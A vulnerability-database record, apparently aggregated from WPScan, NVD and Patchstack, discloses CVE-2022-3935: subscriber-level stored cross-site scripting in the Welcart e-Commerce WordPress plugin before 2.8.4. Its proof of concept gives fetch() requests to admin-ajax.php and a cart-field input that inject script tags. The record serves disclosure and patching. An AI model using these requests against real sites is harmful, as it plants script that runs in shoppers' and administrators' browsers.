The plugin does not sanitise and escape some parameters, which could allow any authenticated users, such as subscriber to perform Stored Cross-Site Scripting attacks
{"id": "WPEX-ID:906C5122-DD6D-494B-B66C-4162E234EA05", "vendorId": null, "type": "wpexploit", "bulletinFamily": "exploit", "title": "Welcart e-Commerce < 2.8.4 - Multiple Subscriber+ Stored Cross-Site Scripting", "description": "The plugin does not sanitise and escape some parameters, which could allow any authenticated users, such as subscriber to perform Stored Cross-Site Scripting attacks\n", "published": "2022-11-21T00:00:00", "modified": "2022-11-21T08:06:04", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM"}, "exploitabilityScore": 2.3, "impactScore": 2.7}, "href": "", "reporter": "Lana Codes", "references": [], "cvelist": ["CVE-2022-3935"], "immutableFields": [], "lastseen": "2022-12-15T02:35:31", "viewCount": 38, "enchantments": {"score": {"value": 0.0, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2022-3935"]}, {"type": "patchstack", "idList": ["PATCHSTACK:1A6ACC83AD4D4274317CCEC58208E2A5"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:906C5122-DD6D-494B-B66C-4162E234EA05"]}]}, "vulnersScore": 0.0}, "_state": {"score": 1671073852, "dependencies": 1671073518}, "_internal": {"score_hash": "65caae4fbcea25f5d5a816534b3b6872"}, "sourceData": "add new payment method with XSS exploit:\r\n\r\nfetch('http://localhost/tester-wp/wp-admin/admin-ajax.php', {\r\n method: 'POST',\r\n headers: new Headers({\r\n 'Content-Type': 'application/x-www-form-urlencoded',\r\n }),\r\n body: 'action=payment_ajax&newname=XSS+Payment&newexplanation=<script>alert(\"XSS\")</script>&newsettlement=acting&newmodule=payment_module'\r\n }).then(response => response.text()).then(result => console.log(result)).catch(error => console.log('error', error));\r\n\r\nThe exploit requires at least a subscriber role.\r\n\r\nThe alert script displayed on the 3. Shipping and Payment tab on the shopping cart page.\r\nCart URL: http://localhost/usces-cart/\r\n\r\n---\r\n\r\nadd item option with XSS exploit:\r\n\r\nfetch('http://localhost/tester-wp/wp-admin/admin-ajax.php', {\r\n method: 'POST',\r\n headers: new Headers({\r\n 'Content-Type': 'application/x-www-form-urlencoded',\r\n }),\r\n body: 'action=item_option_ajax&ID=100&update=1&optname=radio_button&optvalue=%3Cscript%3Ealert(%22radio+button+option+XSS%22)%3C%2Fscript%3E&optmeans=1&optessential=1&sort=0&optmetaid=1'\r\n }).then(response => response.text()).then(result => console.log(result)).catch(error => console.log('error', error));\r\n\r\nIf we want to add it as a common option, the ID will be the Cart page id (#100 cart page id). This post id is public data.\r\n\r\nThen, if the admin selects the option from the list in the \"options for items\" metabox when editing the product, the script will run.\r\n\r\n---\r\n\r\nUser registration is XSS vulnerable.\r\n\r\nAdd a product to the cart, then go to the cart: http://localhost/usces-cart/\r\n\r\nEnter the following code for the city:\r\n\"><script>alert(1)</script>\r\n\r\nThe edit fields are escaped on the admin (for example on user edit page, or order edit page), so the alert script is not displayed. However, if the admin makes changes to the user, the script is added to the log, and the output from the log no longer the escaped, so the alert script runs.\r\n\r\nIn this case, an admin reaction to the XSS exploit is required.", "generation": 0}
{"wpvulndb": [{"lastseen": "2022-12-15T02:35:31", "description": "The plugin does not sanitise and escape some parameters, which could allow any authenticated users, such as subscriber to perform Stored Cross-Site Scripting attacks\n\n### PoC\n\nadd new payment method with XSS exploit: fetch('http://localhost/tester-wp/wp-admin/admin-ajax.php', { method: 'POST', headers: new Headers({ 'Content-Type': 'application/x-www-form-urlencoded', }), body: 'action=payment_ajax&newname;=XSS+Payment&newexplanation;=&newsettlement;=acting&newmodule;=payment_module' }).then(response => response.text()).then(result => console.log(result)).catch(error => console.log('error', error)); The exploit requires at least a subscriber role. The alert script displayed on the 3. Shipping and Payment tab on the shopping cart page. Cart URL: http://localhost/usces-cart/ \\--- add item option with XSS exploit: fetch('http://localhost/tester-wp/wp-admin/admin-ajax.php', { method: 'POST', headers: new Headers({ 'Content-Type': 'application/x-www-form-urlencoded', }), body: 'action=item_option_ajax&ID;=100&update;=1&optname;=radio_button&optvalue;=%3Cscript%3Ealert(%22radio+button+option+XSS%22)%3C%2Fscript%3E&optmeans;=1&optessential;=1&sort;=0&optmetaid;=1' }).then(response => response.text()).then(result => console.log(result)).catch(error => console.log('error', error)); If we want to add it as a common option, the ID will be the Cart page id (#100 cart page id). This post id is public data. Then, if the admin selects the option from the list in the \"options for items\" metabox when editing the product, the script will run. \\--- User registration is XSS vulnerable. Add a product to the cart, then go to the cart: http://localhost/usces-cart/ Enter the following code for the city: \"> The edit fields are escaped on the admin (for example on user edit page, or order edit page), so the alert script is not displayed. However, if the admin makes changes to the user, the script is added to the log, and the output from the log no longer the escaped, so the alert script runs. In this case, an admin reaction to the XSS exploit is required.\n", "cvss3": {"exploitabilityScore": 2.3, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "LOW", "baseScore": 5.4, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2022-11-21T00:00:00", "type": "wpvulndb", "title": "Welcart e-Commerce < 2.8.4 - Multiple Subscriber+ Stored Cross-Site Scripting", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2022-3935"], "modified": "2022-11-21T08:06:04", "id": "WPVDB-ID:906C5122-DD6D-494B-B66C-4162E234EA05", "href": "https://wpscan.com/vulnerability/906c5122-dd6d-494b-b66c-4162e234ea05", "sourceData": "", "cvss": {"score": 0.0, "vector": "NONE"}}], "cve": [{"lastseen": "2022-12-14T23:22:57", "description": "The Welcart e-Commerce WordPress plugin before 2.8.4 does not sanitise and escape some parameters, which could allow any authenticated users, such as subscriber to perform Stored Cross-Site Scripting attacks", "cvss3": {"exploitabilityScore": 2.3, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "LOW", "baseScore": 5.4, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2022-12-12T18:15:00", "type": "cve", "title": "CVE-2022-3935", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {}, "cvelist": ["CVE-2022-3935"], "modified": "2022-12-14T21:22:00", "cpe": [], "id": "CVE-2022-3935", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-3935", "cvss": {"score": 0.0, "vector": "NONE"}, "cpe23": []}], "patchstack": [{"lastseen": "2022-11-24T14:39:55", "description": "Multiple Auth. Stored Cross-Site Scripting (XSS) vulnerabilities discovered by Lana Codes in the WordPress Welcart e-Commerce plugin (versions <= 2.8.3).\n\n## Solution\n\n\r\n Update the WordPress Welcart e-Commerce plugin to the latest available version (at least 2.8.4).\r\n ", "cvss3": {}, "published": "2022-11-21T00:00:00", "type": "patchstack", "title": "WordPress Welcart e-Commerce plugin <= 2.8.3 - Multiple Auth. Stored Cross-Site Scripting (XSS) vulnerabilities", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2022-3935"], "modified": "2022-11-21T00:00:00", "id": "PATCHSTACK:1A6ACC83AD4D4274317CCEC58208E2A5", "href": "https://patchstack.com/database/vulnerability/usc-e-shop/wordpress-welcart-e-commerce-plugin-2-8-3-multiple-auth-stored-cross-site-scripting-xss-vulnerabilities", "cvss": {"score": 0.0, "vector": "NONE"}}]}
Welcart e-Commerce < 2.8.4 - Multiple Subscriber+ Stored Cross-Site Scripting
